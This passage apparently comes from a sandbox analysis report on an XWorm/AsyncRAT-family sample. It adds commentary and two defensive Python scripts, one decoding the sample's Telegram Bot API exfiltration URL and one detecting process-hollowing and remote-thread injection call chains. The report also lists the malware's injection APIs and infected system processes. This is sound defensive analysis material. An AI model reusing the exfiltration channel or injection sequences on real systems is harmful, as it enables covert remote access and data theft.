Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr | String found in binary or memory: https://api.telegram.org/bot
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr | String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
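The string and network rows above are the report's only C2-related observations, and most of the URLs in them (DigiCert CPS, msftconnecttest, aka.ms, contoso.com, Pester, NuGet) are ordinary runtime strings of lsass, svchost and PowerShell rather than indicators. The Python below is an added example, not code from the report or from the sample: it triages those rows by keeping only strings found in the sample's own processes, parses the Telegram Bot API URL, percent-decodes the text parameter (the dangling `%` at the end of the truncated string is preserved) and checks whether the bot token is a real one or the builder's placeholder. The row list is copied from the rows above; the token-shape check (`<digits>:<35 URL-safe characters>`) is an assumption about the usual Bot API token format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Rows copied from the report above as (process the string was found in, string).
# Only the value columns are kept; the .sdmp region identifiers are dropped.
REPORT_STRINGS = [
    ("lsass.exe", "http://www.digicert.com/CPS0~"),
    ("svchost.exe", "http://www.msftconnecttest.com/"),
    ("powershell.exe", "https://aka.ms/pscore68"),
    ("DeadROOTkit.exe", "https://api.telegram.org"),
    ("DeadROOTkit.exe", "https://api.telegram.org/bot"),
    ("DeadROOTkit.exe", "https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text="),
    ("DeadROOTkit.exe",
     "https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%"),
    ("powershell.exe", "https://contoso.com/License"),
    ("powershell.exe", "https://github.com/Pester/Pester"),
    ("powershell.exe", "https://nuget.org/nuget.exe"),
]

# Processes the report shows as dropped or launched by the sample. Strings seen only
# in OS or PowerShell hosts are runtime noise and are not treated as indicators.
SAMPLE_PROCESSES = {"mIURiU8n2P.exe", "DeadXClient.exe", "DeadROOTkit.exe", "Deadsvchost.exe"}

# Bot API call shape: /bot<token>/<method>. A configured token usually looks like
# "<digits>:<35 URL-safe characters>" (assumption used for the placeholder check).
TELEGRAM_CALL = re.compile(r"^https://api\.telegram\.org/bot(?P<token>[^/?]*)/(?P<method>[A-Za-z]+)")
REAL_TOKEN = re.compile(r"^\d+:[A-Za-z0-9_-]{35}$")


def parse_telegram_call(url):
    """Return token, method, chat_id and percent-decoded text of a Bot API URL, or None."""
    m = TELEGRAM_CALL.match(url)
    if not m:
        return None
    # keep_blank_values so the unformatted template ("text=") is still reported;
    # parse_qs percent-decodes and leaves a dangling '%' untouched.
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {
        "token": m["token"],
        "method": m["method"],
        "chat_id": qs.get("chat_id", [""])[0],
        "text": qs.get("text", [""])[0],
        # "Your_Token" / "Your_ID" are the builder's placeholders: never filled in by the operator.
        "token_configured": bool(REAL_TOKEN.match(m["token"])),
    }


def triage(rows):
    """Keep only Telegram references found in the sample's own processes and decode them."""
    findings = []
    for proc, s in rows:
        if proc not in SAMPLE_PROCESSES or "api.telegram.org" not in s:
            continue
        call = parse_telegram_call(s)
        findings.append({
            "process": proc,
            "string": s,
            "kind": "telegram_call" if call else "telegram_api_reference",
            "call": call,
        })
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_STRINGS):
        print(f["process"], f["kind"], f["call"])
```

The decoded text starts with `☠ [XWorm V3.0`, the banner XWorm puts in its Telegram notification, and that is the family-specific evidence on this page; the AsyncRAT YARA hits further down are not a contradiction, since XWorm's client reuses AsyncRAT code (the Helper.cs, AlgorithmAES.cs and ClientSocket.cs names in those rows are common to both). Because token and chat_id are still `Your_Token` and `Your_ID`, any call the sample made would have been rejected by the API; the single TLS 1.2 session to 149.154.167.220:443 (an address in the range api.telegram.org resolves to; confirm with DNS when reproducing) is consistent with such an attempt, not with a working exfiltration channel.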

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: DeadROOTkit.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: DeadROOTkit.exe.2.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: C:\Users\Public\DeadROOTkit.exe | Window created: window name: CLIPBRDWNDCLASS

                          Operating System Destruction

Source: C:\Users\Public\DeadROOTkit.exe | Process information set: 01 00 00 00

                          System Summary

Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: mIURiU8n2P.exe, -Program-.cs | Long String: Length: 253952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7F0C4D NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7F0FD4 NtResumeThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7F0F10 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7F0A2E NtUnmapViewOfSection
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001854 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle
Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC6429B0 NtEnumerateValueKey,NtEnumerateValueKey
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AE2618 NtQueryDirectoryFileEx,GetFileType,StrCpyW
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AE2118 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF2129B0 NtEnumerateValueKey,NtEnumerateValueKey
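The Nt* rows above record two injection primitives. In powershell.exe (report process 4) the four calls NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread, each in its own function, are the parts of process hollowing; in dllhost.exe (process 6) a single function runs OpenProcess, inspects the target's token (OpenProcessToken, GetTokenInformation, GetSidSubAuthority) and then performs VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx, the classic remote-thread injection chain. The Python below is an added example, not code from the report or from the sample, of a detection over an API trace that keys on those call patterns instead of on image names; the trace is constructed from the rows above, with the winlogon/lsass rows and one constructed process that allocates and writes but never starts a thread serving as controls.

```python
from collections import defaultdict

# Constructed API trace: (report process index, image, API). The process 4 and 6
# entries are taken in report order from the "Code function" rows above; index 99
# is a constructed control that is not in the report.
TRACE = [
    (4, "powershell.exe", "NtWriteVirtualMemory"),
    (4, "powershell.exe", "NtResumeThread"),
    (4, "powershell.exe", "NtSetContextThread"),
    (4, "powershell.exe", "NtUnmapViewOfSection"),
    (6, "dllhost.exe", "OpenProcess"),
    (6, "dllhost.exe", "IsWow64Process"),
    (6, "dllhost.exe", "K32GetModuleFileNameExW"),
    (6, "dllhost.exe", "NtQueryInformationProcess"),
    (6, "dllhost.exe", "OpenProcessToken"),
    (6, "dllhost.exe", "GetTokenInformation"),
    (6, "dllhost.exe", "VirtualAllocEx"),
    (6, "dllhost.exe", "WriteProcessMemory"),
    (6, "dllhost.exe", "NtCreateThreadEx"),
    (6, "dllhost.exe", "WaitForSingleObject"),
    (11, "winlogon.exe", "NtEnumerateValueKey"),
    (12, "lsass.exe", "NtQuerySystemInformation"),
    (99, "constructed-installer.exe", "OpenProcess"),       # control: allocates and writes
    (99, "constructed-installer.exe", "VirtualAllocEx"),    # in a remote process but never
    (99, "constructed-installer.exe", "WriteProcessMemory"),  # starts a thread there
]

# Process hollowing: the report lists the four calls in separate functions, so the
# order in which a trace sees them is not reliable; require the complete set per process.
HOLLOWING = {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"}

# Remote-thread injection: an ordered chain, each step accepting the usual alternatives.
REMOTE_THREAD = [
    {"OpenProcess"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
]


def has_ordered_chain(calls, steps):
    """True if `calls` contains one call from each step of `steps`, in order, gaps allowed."""
    i = 0
    for api in calls:
        if i < len(steps) and api in steps[i]:
            i += 1
    return i == len(steps)


def detect(trace):
    """Group calls per process and return (index, image, rule) for every matched pattern."""
    per_proc = defaultdict(list)
    images = {}
    for idx, image, api in trace:
        per_proc[idx].append(api)
        images[idx] = image
    hits = []
    for idx, calls in per_proc.items():
        if HOLLOWING <= set(calls):
            hits.append((idx, images[idx], "process_hollowing"))
        if has_ordered_chain(calls, REMOTE_THREAD):
            hits.append((idx, images[idx], "remote_thread_injection"))
    return hits


if __name__ == "__main__":
    for hit in detect(TRACE):
        print(*hit)
```

Both hosts are Microsoft-signed binaries, so an image-name allowlist does not help here. The "String function ... appears 36 times" rows further down in this group also show that the same code was planted at the same function offsets (...2770, ...B35C, ...F418, ...1778) in winlogon.exe, lsass.exe, dwm.exe, dllhost.exe and four svchost.exe instances, so a response sweep has to cover every one of those processes, not only the initial PowerShell host.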
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\DeadROOTkit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qnblsrzc.xue.ps1
Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Code function: 0_2_00007FFD9B800C11
Source: C:\Users\Public\DeadXClient.exe | Code function: 1_2_00007FFD9B7F6F66
Source: C:\Users\Public\DeadXClient.exe | Code function: 1_2_00007FFD9B7F7D12
Source: C:\Users\Public\DeadXClient.exe | Code function: 1_2_00007FFD9B7F0E79
Source: C:\Users\Public\DeadXClient.exe | Code function: 1_2_00007FFD9B7F1799
Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B8012E9
Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B805F06
Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B8021D1
Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B806CB2
Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B8046DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7EF649
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7EB2FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7EE319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7EFDD9
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_000002E86A06F418
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_000002E86A06B150
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_000002E86A06B35C
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_000002E86A071778
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001CDC
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002D54
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002430
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000001400031D8
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A0A0018
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A09BD50
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A09BF5C
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A0A2378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9B8A30E9
Source: C:\Windows\System32\winlogon.exe | Code function: 11_3_00000225DC621778
Source: C:\Windows\System32\winlogon.exe | Code function: 11_3_00000225DC61B35C
Source: C:\Windows\System32\winlogon.exe | Code function: 11_3_00000225DC61F418
Source: C:\Windows\System32\winlogon.exe | Code function: 11_3_00000225DC61B150
Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC652378
Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC64BF5C
Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC650018
Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC64BD50
Source: C:\Windows\System32\lsass.exe | Code function: 12_3_00000202C0AC1778
Source: C:\Windows\System32\lsass.exe | Code function: 12_3_00000202C0ABB35C
Source: C:\Windows\System32\lsass.exe | Code function: 12_3_00000202C0ABF418
Source: C:\Windows\System32\lsass.exe | Code function: 12_3_00000202C0ABB150
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AF2378
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AF0018
Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AEBD50
Source: C:\Users\Public\Deadsvchost.exe | Code function: 13_2_00007FFD9B800E79
Source: C:\Users\Public\Deadsvchost.exe | Code function: 13_2_00007FFD9B801799
Source: C:\Windows\System32\svchost.exe | Code function: 14_3_000002A6612DB35C
Source: C:\Windows\System32\svchost.exe | Code function: 14_3_000002A6612E1778
Source: C:\Windows\System32\svchost.exe | Code function: 14_3_000002A6612DB150
Source: C:\Windows\System32\svchost.exe | Code function: 14_3_000002A6612DF418
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A66130BF5C
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A661312378
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A66130BD50
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A661310018
Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002BAAF1F1778
Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002BAAF1EB35C
Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002BAAF1EB150
Source: C:\Windows\System32\dwm.exe | Code function: 16_3_000002BAAF1EF418
Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF222378
Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF21BD50
Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF220018
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000026A8799F418
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000026A8799B35C
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000026A879A1778
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000026A8799B150
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879D0018
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879D2378
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879CBD50
Source: C:\Windows\System32\svchost.exe | Code function: 19_3_000001795377B150
Source: C:\Windows\System32\svchost.exe | Code function: 19_3_0000017953781778
Source: C:\Windows\System32\svchost.exe | Code function: 19_3_000001795377B35C
Source: C:\Windows\System32\svchost.exe | Code function: 19_3_000001795377F418
Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537ABD50
Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537B2378
Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537B0018
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_000002295D53B150
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_000002295D53F418
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_000002295D53B35C
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_000002295D541778
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D56BD50
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D570018
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D56BF5C
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D572378
Source: C:\Windows\System32\svchost.exe | Code function: String function: 000002A6612E2770 appears 36 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000026A879A2770 appears 36 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000017953782770 appears 36 times
Source: C:\Windows\System32\svchost.exe | Code function: String function: 000002295D542770 appears 36 times
Source: C:\Windows\System32\winlogon.exe | Code function: String function: 00000225DC622770 appears 36 times
Source: C:\Windows\System32\lsass.exe | Code function: String function: 00000202C0AC2770 appears 36 times
Source: C:\Windows\System32\dllhost.exe | Code function: String function: 000002E86A072770 appears 36 times
Source: C:\Windows\System32\dwm.exe | Code function: String function: 000002BAAF1F2770 appears 36 times
Source: DeadCodeRootKit.exe.0.dr | Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: mIURiU8n2P.exe, 00000000.00000002.1704251593.000000001B256000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703998113.0000000012788000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDealarOrDeadCode.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDeadROOTkit.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000000.1663022110.00000000003F0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe | Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | Process created: Commandline size = 5531
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: DeadXClient.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Deadsvchost.exe.1.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Deadsvchost.exe.1.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadXClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadXClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr | Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.25.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: System.evtx.25.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe`
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr | Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.25.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr | Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.25.dr | Binary string: C:\Device\HarddiskVolume3`
Source: Security.evtx.25.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr | Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.25.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeX
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr | Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr | Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
